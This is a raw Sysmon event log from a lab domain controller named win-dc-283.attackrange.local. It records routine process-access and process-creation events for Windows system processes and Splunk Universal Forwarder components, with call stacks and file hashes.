16:01:07.222{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-53C3-6008-9006-00000000A301}7324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.222{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C3-6008-9006-00000000A301}7324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:07.223{7901BC46-53C3-6008-9006-00000000A301}7324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.707{7901BC46-53C4-6008-9206-00000000A301}71043876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C4-6008-9206-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-53C4-6008-9206-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.566{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C4-6008-9206-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:08.567{7901BC46-53C4-6008-9206-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.707{7901BC46-53C5-6008-9306-00000000A301}76322880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C5-6008-9306-00000000A301}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53C5-6008-9306-00000000A301}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.566{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C5-6008-9306-00000000A301}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:09.567{7901BC46-53C5-6008-9306-00000000A301}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.378{7901BC46-53C6-6008-9406-00000000A301}9487828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53C6-6008-9406-00000000A301}948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53C6-6008-9406-00000000A301}948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:10.238{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53C6-6008-9406-00000000A301}948C:\Program 